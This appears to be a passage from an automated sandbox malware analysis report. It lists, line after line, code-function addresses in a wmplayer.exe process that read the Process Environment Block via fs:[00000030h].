Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038663FF mov eax, dword ptr fs:[00000030h]	6_2_038663FF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B930B mov eax, dword ptr fs:[00000030h]	6_2_038B930B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B930B mov eax, dword ptr fs:[00000030h]	6_2_038B930B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B930B mov eax, dword ptr fs:[00000030h]	6_2_038B930B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386A30B mov eax, dword ptr fs:[00000030h]	6_2_0386A30B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386A30B mov eax, dword ptr fs:[00000030h]	6_2_0386A30B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386A30B mov eax, dword ptr fs:[00000030h]	6_2_0386A30B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382C310 mov ecx, dword ptr fs:[00000030h]	6_2_0382C310
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03850310 mov ecx, dword ptr fs:[00000030h]	6_2_03850310
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F132D mov eax, dword ptr fs:[00000030h]	6_2_038F132D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F132D mov eax, dword ptr fs:[00000030h]	6_2_038F132D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385F32A mov eax, dword ptr fs:[00000030h]	6_2_0385F32A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03827330 mov eax, dword ptr fs:[00000030h]	6_2_03827330
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]	6_2_038B2349
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382D34C mov eax, dword ptr fs:[00000030h]	6_2_0382D34C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382D34C mov eax, dword ptr fs:[00000030h]	6_2_0382D34C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03905341 mov eax, dword ptr fs:[00000030h]	6_2_03905341
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829353 mov eax, dword ptr fs:[00000030h]	6_2_03829353
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829353 mov eax, dword ptr fs:[00000030h]	6_2_03829353
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]	6_2_038B035C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]	6_2_038B035C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]	6_2_038B035C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B035C mov ecx, dword ptr fs:[00000030h]	6_2_038B035C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]	6_2_038B035C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]	6_2_038B035C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FA352 mov eax, dword ptr fs:[00000030h]	6_2_038FA352
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EF367 mov eax, dword ptr fs:[00000030h]	6_2_038EF367
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038D437C mov eax, dword ptr fs:[00000030h]	6_2_038D437C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03837370 mov eax, dword ptr fs:[00000030h]	6_2_03837370
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03837370 mov eax, dword ptr fs:[00000030h]	6_2_03837370
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03837370 mov eax, dword ptr fs:[00000030h]	6_2_03837370
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386E284 mov eax, dword ptr fs:[00000030h]	6_2_0386E284
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386E284 mov eax, dword ptr fs:[00000030h]	6_2_0386E284
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B0283 mov eax, dword ptr fs:[00000030h]	6_2_038B0283
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B0283 mov eax, dword ptr fs:[00000030h]	6_2_038B0283
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B0283 mov eax, dword ptr fs:[00000030h]	6_2_038B0283
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03905283 mov eax, dword ptr fs:[00000030h]	6_2_03905283
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386329E mov eax, dword ptr fs:[00000030h]	6_2_0386329E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386329E mov eax, dword ptr fs:[00000030h]	6_2_0386329E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038402A0 mov eax, dword ptr fs:[00000030h]	6_2_038402A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038402A0 mov eax, dword ptr fs:[00000030h]	6_2_038402A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038452A0 mov eax, dword ptr fs:[00000030h]	6_2_038452A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038452A0 mov eax, dword ptr fs:[00000030h]	6_2_038452A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038452A0 mov eax, dword ptr fs:[00000030h]	6_2_038452A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038452A0 mov eax, dword ptr fs:[00000030h]	6_2_038452A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F92A6 mov eax, dword ptr fs:[00000030h]	6_2_038F92A6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F92A6 mov eax, dword ptr fs:[00000030h]	6_2_038F92A6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F92A6 mov eax, dword ptr fs:[00000030h]	6_2_038F92A6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F92A6 mov eax, dword ptr fs:[00000030h]	6_2_038F92A6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]	6_2_038C62A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	6_2_038C62A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]	6_2_038C62A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]	6_2_038C62A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]	6_2_038C62A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C62A0 mov eax, dword ptr fs:[00000030h]	6_2_038C62A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C72A0 mov eax, dword ptr fs:[00000030h]	6_2_038C72A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C72A0 mov eax, dword ptr fs:[00000030h]	6_2_038C72A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B92BC mov eax, dword ptr fs:[00000030h]	6_2_038B92BC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B92BC mov eax, dword ptr fs:[00000030h]	6_2_038B92BC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B92BC mov ecx, dword ptr fs:[00000030h]	6_2_038B92BC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B92BC mov ecx, dword ptr fs:[00000030h]	6_2_038B92BC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0383A2C3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0383A2C3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0383A2C3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0383A2C3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0383A2C3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]	6_2_0385B2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]	6_2_0385B2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]	6_2_0385B2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]	6_2_0385B2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]	6_2_0385B2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]	6_2_0385B2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B2C0 mov eax, dword ptr fs:[00000030h]	6_2_0385B2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038392C5 mov eax, dword ptr fs:[00000030h]	6_2_038392C5
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038392C5 mov eax, dword ptr fs:[00000030h]	6_2_038392C5
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B2D3 mov eax, dword ptr fs:[00000030h]	6_2_0382B2D3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B2D3 mov eax, dword ptr fs:[00000030h]	6_2_0382B2D3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B2D3 mov eax, dword ptr fs:[00000030h]	6_2_0382B2D3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385F2D0 mov eax, dword ptr fs:[00000030h]	6_2_0385F2D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385F2D0 mov eax, dword ptr fs:[00000030h]	6_2_0385F2D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED mov eax, dword ptr fs:[00000030h]	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038402E1 mov eax, dword ptr fs:[00000030h]	6_2_038402E1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038402E1 mov eax, dword ptr fs:[00000030h]	6_2_038402E1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038402E1 mov eax, dword ptr fs:[00000030h]	6_2_038402E1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_039052E2 mov eax, dword ptr fs:[00000030h]	6_2_039052E2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EF2F8 mov eax, dword ptr fs:[00000030h]	6_2_038EF2F8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038292FF mov eax, dword ptr fs:[00000030h]	6_2_038292FF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03867208 mov eax, dword ptr fs:[00000030h]	6_2_03867208
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03867208 mov eax, dword ptr fs:[00000030h]	6_2_03867208
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03905227 mov eax, dword ptr fs:[00000030h]	6_2_03905227
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382823B mov eax, dword ptr fs:[00000030h]	6_2_0382823B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829240 mov eax, dword ptr fs:[00000030h]	6_2_03829240
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829240 mov eax, dword ptr fs:[00000030h]	6_2_03829240
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386724D mov eax, dword ptr fs:[00000030h]	6_2_0386724D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382A250 mov eax, dword ptr fs:[00000030h]	6_2_0382A250
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EB256 mov eax, dword ptr fs:[00000030h]	6_2_038EB256
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EB256 mov eax, dword ptr fs:[00000030h]	6_2_038EB256
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03836259 mov eax, dword ptr fs:[00000030h]	6_2_03836259
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03834260 mov eax, dword ptr fs:[00000030h]	6_2_03834260
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03834260 mov eax, dword ptr fs:[00000030h]	6_2_03834260
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03834260 mov eax, dword ptr fs:[00000030h]	6_2_03834260
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FD26B mov eax, dword ptr fs:[00000030h]	6_2_038FD26B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FD26B mov eax, dword ptr fs:[00000030h]	6_2_038FD26B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382826B mov eax, dword ptr fs:[00000030h]	6_2_0382826B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03859274 mov eax, dword ptr fs:[00000030h]	6_2_03859274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03871270 mov eax, dword ptr fs:[00000030h]	6_2_03871270
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03871270 mov eax, dword ptr fs:[00000030h]	6_2_03871270
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274 mov eax, dword ptr fs:[00000030h]	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03870185 mov eax, dword ptr fs:[00000030h]	6_2_03870185
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EC188 mov eax, dword ptr fs:[00000030h]	6_2_038EC188
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EC188 mov eax, dword ptr fs:[00000030h]	6_2_038EC188
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B019F mov eax, dword ptr fs:[00000030h]	6_2_038B019F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B019F mov eax, dword ptr fs:[00000030h]	6_2_038B019F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B019F mov eax, dword ptr fs:[00000030h]	6_2_038B019F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B019F mov eax, dword ptr fs:[00000030h]	6_2_038B019F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382A197 mov eax, dword ptr fs:[00000030h]	6_2_0382A197
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382A197 mov eax, dword ptr fs:[00000030h]	6_2_0382A197
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382A197 mov eax, dword ptr fs:[00000030h]	6_2_0382A197
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03887190 mov eax, dword ptr fs:[00000030h]	6_2_03887190
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E11A4 mov eax, dword ptr fs:[00000030h]	6_2_038E11A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E11A4 mov eax, dword ptr fs:[00000030h]	6_2_038E11A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E11A4 mov eax, dword ptr fs:[00000030h]	6_2_038E11A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E11A4 mov eax, dword ptr fs:[00000030h]	6_2_038E11A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384B1B0 mov eax, dword ptr fs:[00000030h]	6_2_0384B1B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F61C3 mov eax, dword ptr fs:[00000030h]	6_2_038F61C3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F61C3 mov eax, dword ptr fs:[00000030h]	6_2_038F61C3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386D1D0 mov eax, dword ptr fs:[00000030h]	6_2_0386D1D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386D1D0 mov ecx, dword ptr fs:[00000030h]	6_2_0386D1D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	6_2_038AE1D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	6_2_038AE1D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	6_2_038AE1D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	6_2_038AE1D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	6_2_038AE1D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_039051CB mov eax, dword ptr fs:[00000030h]	6_2_039051CB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038551EF mov eax, dword ptr fs:[00000030h]	6_2_038551EF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038351ED mov eax, dword ptr fs:[00000030h]	6_2_038351ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_039061E5 mov eax, dword ptr fs:[00000030h]	6_2_039061E5
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038601F8 mov eax, dword ptr fs:[00000030h]	6_2_038601F8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038DA118 mov ecx, dword ptr fs:[00000030h]	6_2_038DA118
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038DA118 mov eax, dword ptr fs:[00000030h]	6_2_038DA118
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038DA118 mov eax, dword ptr fs:[00000030h]	6_2_038DA118
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038DA118 mov eax, dword ptr fs:[00000030h]	6_2_038DA118
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F0115 mov eax, dword ptr fs:[00000030h]	6_2_038F0115
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03860124 mov eax, dword ptr fs:[00000030h]	6_2_03860124
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03831131 mov eax, dword ptr fs:[00000030h]	6_2_03831131
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03831131 mov eax, dword ptr fs:[00000030h]	6_2_03831131
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B136 mov eax, dword ptr fs:[00000030h]	6_2_0382B136
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B136 mov eax, dword ptr fs:[00000030h]	6_2_0382B136
